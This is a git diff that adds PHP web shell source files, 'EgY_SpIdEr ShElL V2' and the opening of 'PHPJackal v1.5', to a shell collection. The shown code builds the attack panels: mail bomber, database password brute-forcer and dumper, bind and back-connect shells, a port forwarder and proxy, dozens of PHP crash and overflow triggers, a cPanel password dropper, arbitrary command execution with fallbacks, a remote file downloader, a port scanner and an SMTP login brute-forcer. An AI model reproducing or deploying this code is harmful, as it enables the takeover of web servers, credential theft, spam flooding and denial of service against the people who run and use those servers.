+echo $table_up1.div_title($lang[$language.'_text102'],'id35').$table_up2.div('id35').$ts."<tr>".$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir)); +echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("egy_spider@hotmail.com")))); +echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("hello EgY SpIdEr")))); +echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=22 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>'); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15'])); + +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir)); +echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("egy_spider@hotmail.com")))); +echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("file from egy spider shell")))); +echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',30,$dir)); +echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15'])); + +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text139']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_bomber').in('hidden','dir',0,$dir)); +echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("egy_spider@hotmail.com")))); +echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("hello EgY SpIdEr")))); +echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=22 rows=1>'.(!empty($_POST['text'])?($_POST['text']):("flood text here")).'</textarea>'); +echo sr(25,"<b>Flood".$arrow."</b>",in('int','mail_flood',5,(!empty($_POST['mail_flood'])?($_POST['mail_flood']):100)).ws(4)."<b>Size(kb)".$arrow."</b>".in('int','mail_size',5,(!empty($_POST['mail_size'])?($_POST['mail_size']):10))); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15'])); + +echo $te."</td>".$fe."</tr></div></table>"; +} + + +{ +$select = '<select name=db>'; +if($mysql_on) $select .= '<option value=MySQL>MySQL</option>'; +if($mssql_on) $select .= '<option value=MSSQL>MSSQL</option>'; +if($pg_on) $select .= '<option value=PostgreSQL>PostgreSQL</option>'; +if($ora_on) $select .= '<option value=Oracle>Oracle</option>'; +if($mysqli_on) $select .= '<option value=MySQLi>MySQLi</option>'; +if($msql_on) $select .= '<option value=mSQL>mSQL</option>'; +if($sqlite_on) $select .= '<option value=SQLite>SQLite</option>'; +$select .= '</select>'; + +echo $table_up1.div_title($lang[$language.'_text82'],'id36').$table_up3.div('id36').$ts."<tr>".$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text134']."</div></b></font>"; + +echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select.in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_brute')); +echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):("")))); +echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql")))); +echo sr(25,"",in('radio','brute_method',0,'passwd',1)."<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href='".$_SERVER['PHP_SELF']."?users'>".$lang[$language.'_text95']."</a> )</font>"); +echo sr(25,"",in('checkbox','reverse id=reverse',0,'1',1).$lang[$language.'_text101']); +echo sr(25,"",in('radio','brute_method',0,'dic',0).$lang[$language.'_text135']); +echo sr(35,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root")))); +echo sr(25,"<b>".$lang[$language.'_text135'].$arrow."</b>",in('text','dictionary',0,(!empty($_POST['dictionary'])?($_POST['dictionary']):($dir.'passw.dic')))); +echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt1'])); + +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>"; + +echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select); +echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):("")))); +echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',8,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',8,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user")))); +echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',17,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql")))); +echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9'])); + +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>"; + +echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select); +echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):("")))); +echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',8,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql")))); +echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),""); +echo $te."<div align=center id='n'><textarea cols=30 rows=4 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSHOW TABLES;\nSELECT * FROM user;\nSELECT version();\nSELECT user();"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div>"; + +echo "</td>".$fe."</tr></div></table>"; +} + + +{ +echo $table_up1.div_title($lang[$language.'_text81'],'id555555').$table_up2.div('id555555').$ts."<tr>".$fs."<td valign=top width=25%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',10,'11457')); +echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',10,'r57')); +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3'])); +echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")))); +echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4'])); +echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',10,'11457')); +echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',10,'irc.dalnet.ru')); +echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',10,'6667')); +echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5'])); +echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>Proxy</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','proxy_port',10,'31337')); +echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5'])); +echo $te."</td>".$fe."</tr></div></table>"; +} +echo $table_up1.div_title($lang[$language.'_text81'],'id5525555').$table_up2.div('id5525555').$ts."<tr>".$fs."<td valign=top width=34%>".$ts; +echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port1',35,'9999').ws(4).in('submit','submit',0,$lang[$language.'_butt3'])); +echo $te."</td>".$fe."</tr></div></table>"; + +echo $table_up1.div_title($lang[$language.'_text140'],'id38').$table_up2.div('id38').$ts."<tr><td valign=top width=25%>".$ts; +echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>"; +echo sr(10,"",$fs.in('hidden','cmd',0,'dos1').in('submit','submit',0,'Recursive memory exhaustion').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos2').in('submit','submit',0,'Memory_limit [pack()]').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos3').in('submit','submit',0,'BoF [unserialize()]').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos4').in('submit','submit',0,'BoF ZendEngine').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos5').in('submit','submit',0,'SQlite [dl()] vuln').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos6').in('submit','submit',0,'PCRE [preg_match()](PHP<5.2.1)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos7').in('submit','submit',0,'Mem_limit [str_repeat()](PHP<5.2.1)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos8').in('submit','submit',0,'Apache process killer').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos9').in('submit','submit',0,'Overload [tempnam()](PHP<5.1.2)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos10').in('submit','submit',0,'BoF [wordwrap()](PHP<5.1.2)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos11').in('submit','submit',0,'BoF [array_fill()](PHP<5.1.2)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos12').in('submit','submit',0,'BoF [substr_compare()](PHP<5.1.2)').$fe); +echo $te."</td><td valign=top width=25%>".$ts; +echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>"; +echo sr(10,"",$fs.in('hidden','cmd',0,'dos13').in('submit','submit',0,'Arr. Cr. 64b[unserialize()](PHP<5.2.1)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos14').in('submit','submit',0,'BoF [str_ireplace()](PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos15').in('submit','submit',0,'BoF [htmlentities()](PHP<5.1.6,4.4.4)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos16').in('submit','submit',0,'BoF [zip_entry_read()](PHP<4.4.5)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos17').in('submit','submit',0,'BoF [sqlite_udf_decode_binary()](PHP<5.2.1)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos18').in('submit','submit',0,'BoF [msg_receive()](PHP<5.2.1)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos19').in('submit','submit',0,'BoF [php_stream_filter_create()](PHP5<5.2.1)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos20').in('submit','submit',0,'BoF [unserialize()](PHP<4.4.4)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos21').in('submit','submit',0,'BoF [gdImageCreateTrueColor()](PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos22').in('submit','submit',0,'BoF [gdImageCopyResized()](PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos23').in('submit','submit',0,'DoS [iconv_substr()](PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos24').in('submit','submit',0,'DoS [setlocale()](PHP<5.2.x)').$fe); +echo $te."</td><td valign=top width=25%>".$ts; +echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>"; +echo sr(10,"",$fs.in('hidden','cmd',0,'dos25').in('submit','submit',0,'DoS [glob()] 1 (PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos26').in('submit','submit',0,'DoS [glob()] 2 (PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos27').in('submit','submit',0,'DoS [fnmatch()](PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos28').in('submit','submit',0,'BoF [imagepsloadfont()](PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos29').in('submit','submit',0,'BoF mSQL [msql_connect](PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos30').in('submit','submit',0,'BoF [chunk_split()](PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos31').in('submit','submit',0,'BoF [php_win32sti.dl](PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos32').in('submit','submit',0,'BoF [php_iisfunc.dll](PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos33').in('submit','submit',0,'BoF [ntuser_getuserlist()](PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos34').in('submit','submit',0,'DoS [com_print_typeinfo()](PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos35').in('submit','submit',0,'BoF [iconv()](PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos36').in('submit','submit',0,'BoF [iconv_m_d_headers()](PHP<5.2.x)').$fe); +echo $te."</td><td valign=top width=25%>".$ts; +echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>"; +echo sr(10,"",$fs.in('hidden','cmd',0,'dos37').in('submit','submit',0,'BoF [iconv_mime_decode()](PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos38').in('submit','submit',0,'BoF [iconv_strlen()](PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos39').in('submit','submit',0,'BoF [printf()](PHP<5.2.5) and prior').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos40').in('submit','submit',0,'BoF [mssql_connect(), mssql_pconnect()](PHP<4.4.6) and prior').$fe); +/*echo sr(10,"",$fs.in('hidden','cmd',0,'dos').in('submit','submit',0,'BoF [()](PHP<5.2.x)').$fe);*/ +echo $te."</td></tr></div></table>"; +echo $fs.$table_up1.div_title($lang[$language.'_text211'],'id11111').$table_up2.div('id11111').$ts; +echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text213']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','htacces',10,'.htaccess').ws(4).in('submit','submit',0,$lang[$language.'_butt65'])); +echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text218']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','egy_ini',10,'ini.php').ws(4).in('submit','submit',0,$lang[$language.'_butt65'])); +echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text228']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','egy_vb',10,'vb_hacker.php').ws(4).in('submit','submit',0,$lang[$language.'_butt65'])); +echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text230']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','egy_cp',10,'pass_cpanel.php').ws(4).in('submit','submit',0,$lang[$language.'_butt65'])); +echo $te.'</div>'.$table_end1.$fe; +{ + + + +echo $te."</td>".$fe."</tr></div></table>"; +} + +echo $te."</td></tr></div></table>"; +echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=tahoma size=-2><b>o---[ EgY_SpIdEr | </a> | <a egy_spider@hotmail.com>egy_spider@hotmail.com</a> developer by EgY SpIdEr ]---o</b></font></div></td></tr></table>"; +echo '</body></html>'; +?> diff --git a/php/PHPshell/م€گEgY_SpIdEr ShElL V2م€‘/EgY_SpIdEr ShElL V2.php.jpg b/php/PHPshell/م€گEgY_SpIdEr ShElL V2م€‘/EgY_SpIdEr ShElL V2.php.jpg new file mode 100644 index 0000000..1ea4e3f Binary files /dev/null and b/php/PHPshell/م€گEgY_SpIdEr ShElL V2م€‘/EgY_SpIdEr ShElL V2.php.jpg differ diff --git a/php/PHPshell/م€گEgY_SpIdEr ShElL V2م€‘/EgY_SpIdEr ShElL V2.php2.jpg b/php/PHPshell/م€گEgY_SpIdEr ShElL V2م€‘/EgY_SpIdEr ShElL V2.php2.jpg new file mode 100644 index 0000000..2d94764 Binary files /dev/null and b/php/PHPshell/م€گEgY_SpIdEr ShElL V2م€‘/EgY_SpIdEr ShElL V2.php2.jpg differ diff --git a/php/PHPshell/م€گPHPJackal v1.5م€‘/PHPJackal v1.5.jpg b/php/PHPshell/م€گPHPJackal v1.5م€‘/PHPJackal v1.5.jpg new file mode 100644 index 0000000..0d35b0b Binary files /dev/null and b/php/PHPshell/م€گPHPJackal v1.5م€‘/PHPJackal v1.5.jpg differ diff --git a/php/PHPshell/م€گPHPJackal v1.5م€‘/PHPJackal v1.5.php b/php/PHPshell/م€گPHPJackal v1.5م€‘/PHPJackal v1.5.php new file mode 100644 index 0000000..37adef6 --- /dev/null +++ b/php/PHPshell/م€گPHPJackal v1.5م€‘/PHPJackal v1.5.php @@ -0,0 +1,1413 @@ +<?php +#--Config--# +$login_password= '123456'; //صâتاأـآë +#----------# +error_reporting(E_ALL); +set_time_limit(0); +ini_set("max_execution_time","0"); +ini_set("memory_limit","9999M"); +set_magic_quotes_runtime(0); +if(!isset($_SERVER))$_SERVER = &$HTTP_SERVER_VARS; +if(!isset($_POST))$_POST = &$HTTP_POST_VARS; +if(!isset($_GET))$_GET = &$HTTP_GET_VARS; +if(!isset($_COOKIE))$_COOKIE=$HTTP_COOKIE_VARS; +$_REQUEST = array_merge($_GET, $_POST); +if (get_magic_quotes_gpc()){ +foreach ($_REQUEST as $key=>$value) +{ +$_REQUEST[$key]=stripslashes($value); +} +} +function hlinK($str=""){ +$myvars=array('workingdiR','urL','imagE','namE','filE','downloaD','seC','cP','mV','rN','deL'); +$ret=$_SERVER['PHP_SELF']."?"; +$new=explode("&",$str); +foreach ($_GET as $key => $v){ +$add=1; +foreach($new as $m){ +$el = explode("=", $m); +if ($el[0]==$key)$add=0; +} +if($add)if(!in_array($key,$myvars))$ret.=$key."=".$v."&"; +} +$ret.=$str; +return $ret; +} +if(!empty($login_password)){ +if(!empty($_REQUEST['fpassw'])){ +if($_REQUEST['fpassw']==$login_password)setcookie('passw',md5($_REQUEST['fpassw'])); +@header("Location: ".hlinK()); +} +if(empty($_COOKIE['passw']) || $_COOKIE['passw']!=md5($login_password))die("<html><body><table><form method=post><tr><td>Password:</td><td><input type=hidden name=seC value=about><input type=password name=fpassw></td></tr><tr><td></td><td><input type=submit value=login></td></tr></form></table></body></html>"); +} +if (!empty($_REQUEST['workingdiR'])) chdir($_REQUEST['workingdiR']); +function checkthisporT($ip,$port,$timeout,$type=0){ +if(!$type){ +$scan=@fsockopen($ip,$port,$n,$s,$timeout); +if($scan){fclose($scan);return 1;} +} +elseif(function_exists('socket_set_timeout')){ +$scan=@fsockopen("udp://".$ip,$port); +if($scan){ +socket_set_timeout($scan,$timeout); +@fwrite($scan,"\x00"); +$s=time(); +fread($scan,1); +if((time()-$s)>=$timeout){fclose($scan);return 1;} +} +} +return 0; +} +if (!function_exists("file_get_contents")){ +function file_get_contents($addr){ +$a = fopen($addr,"r"); +$tmp = fread($a,filesize($a)); +fclose($a); +if($a)return $tmp; +} +} +if (!function_exists("file_put_contents")){ +function file_put_contents($addr,$con){ +$a = fopen($addr,"w"); +if(!$a)return 0; +fwrite($a,$con); +fclose($a); +return strlen($con); +} +} +function flusheR(){ +flush();@ob_flush(); +} +if (!empty($_REQUEST['downloaD'])){ +@ob_clean(); +$dl=$_REQUEST['downloaD']; +$con=file_get_contents($dl); +header("Content-type: application/octet-stream"); +header("Content-disposition: attachment; filename=\"$dl\";"); +header("Content-length: ".strlen($con)); +echo $con; +exit; +} +if (!empty($_REQUEST['imagE'])){ +$img=$_REQUEST['imagE']; +header("Content-type: imagE/gif"); +header("Content-length: ".filesize($img)); +header("Last-Modified: ".date("r",filemtime($img))); +echo file_get_contents($img); +exit; +} +@header("Cache-Control: no-cache, must-revalidate"); +@header("Expires: Mon, 7 Aug 1987 05:00:00 GMT"); +function showsizE($size){ +if ($size>=1073741824)$size = round(($size/1073741824) ,2)." GB"; +elseif ($size>=1048576)$size = round(($size/1048576),2)." MB"; +elseif ($size>=1024)$size = round(($size/1024),2)." KB"; +else $size .= " B"; +return $size; +} +if (substr((strtoupper(php_unamE())),0,3)=="WIN") $windows=1; else $windows=0; +$errorbox = "<table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><tr><td><b>Error: </b>"; +$et = "</td></tr></table>"; +$v="1.5"; +$msgbox="<br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><tr><td align=\"center\">"; +$intro="<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\"><tr><td bgcolor=\"#666666\"><b>Script:</b><br>".str_repeat("-=-",25)."<br><b>Name:</b> PHPJackal<br><b>Version:</b> $v<br><br><b>Author:</b><br>".str_repeat("-=-",25)."<br><b>Name:</b> NetJackal<br><b>Country:</b> Iran<br><b>Website:</b> <a href=\"http://netjackal.by.ru\" target=\"_blank\">http://netjackal.by.ru</a><br><b>Email:</b> <a href=\"mailto:nima_501@yahoo.com?subject=PHPJackal\">nima_501@yahoo.com</a><br></font>$et</center>"; +$footer="${msgbox}PHPJackal v$v - Powered By <a href=\"http://netjackal.by.ru\" target=\"_blank\">NetJackal</a>$et"; +$hcwd="<input type=hidden name=workingdiR value=\"".getcwd()."\">"; +$t = "<table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"40%\" bgcolor=\"#333333\">"; +$crack="</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\" name=form><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target value=localhost size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Start></td></tr></form></table></center>"; +function namE(){ +$name=''; +srand((double)microtime()*100000); +for ($i=0;$i<=rand(3,10);$i++){ +$name.=chr(rand(97,122)); +} +return $name; +} +function whereistmP(){ +$uploadtmp=ini_get('upload_tmp_dir'); +$envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP'); +if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp'; +if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp'; +if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp'; +if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp; +if(is_dir($envtmp) && is_writable($envtmp))return $envtmp; +return "."; +} +function shelL($command){ +global $windows,$disablefunctions; +$exec = '';$output= ''; +$dep[]=array('pipe','r');$dep[]=array('pipe','w'); +if(is_callable('passthru') && !strstr($disablefunctions,'passthru')){ @ob_start();passthru($command);$exec=@ob_get_contents();@ob_clean();@ob_end_clean();} +elseif(is_callable('system') && !strstr($disablefunctions,'system')){$tmp = @ob_get_contents(); @ob_clean();system($command) ; $output = @ob_get_contents(); @ob_clean(); $exec= $tmp; } +elseif(is_callable('exec') && !strstr($disablefunctions,'exec')) {exec($command,$output);$output = join("\n",$output);$exec= $output;} +elseif(is_callable('shell_exec') && !strstr($disablefunctions,'shell_exec')){$exec= shell_exec($command);} +elseif(is_resource($output=popen($command,"r"))) {while(!feof($output)){$exec= fgets($output);}pclose($output);} +elseif(is_resource($res=proc_open($command,$dep,$pipes))){while(!feof($pipes[1])){$line = fgets($pipes[1]); $output.=$line;}$exec= $output;proc_close($res);} +elseif ($windows && is_object($ws = new COM("WScript.Shell"))){$dir=(isset($_SERVER["TEMP"]))?$_SERVER["TEMP"]:ini_get('upload_tmp_dir') ;$name = $_SERVER["TEMP"].namE();$ws->Run("cmd.exe /C $command >$name", 0, true);$exec = file_get_contents($name);unlink($name);} +return $exec; +} +function downloadiT($get,$put){ +$fo=@strtolower(ini_get('allow_url_fopen')); +if($fo || $fo=='on')$con=file_get_contents($get); +else{ +$u=parse_url($get); +$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/'; +$url=fsockopen($host, 80, $en, $es, 12); +fputs($url, "GET $file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n"); +$tmp=$con=''; +while($tmp!="\r\n")$tmp=fgets($url); +while(!feof($url))$con.=fgets($url); +} +$mk=file_put_contents($put,$con); +if($mk)return 1; +return 0; +} +function smtplogiN($addr,$user,$pass,$timeout){ +$sock=fsockopen($addr,25,$n,$s,$timeout); +if(!$sock)return -1; +fread($sock,1024); +fputs($sock,'ehlo '.namE()."\r\n"); +$res=substr(fgets($sock,512),0,1); +if($res!='2')return 0; +fgets($sock,512);fgets($sock,512);fgets($sock,512); +fputs($sock,"AUTH LOGIN\r\n"); +$res=substr(fgets($sock,512),0,3); +if($res!='334')return 0; +fputs($sock,base64_encode($user)."\r\n"); +$res=substr(fgets($sock,512),0,3); +if($res!='334')return 0; +fputs($sock,base64_encode($pass)."\r\n"); 